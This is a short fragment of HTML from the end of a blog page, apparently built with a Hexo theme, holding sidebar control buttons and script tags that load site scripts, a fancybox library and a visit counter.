fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.umd.min.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>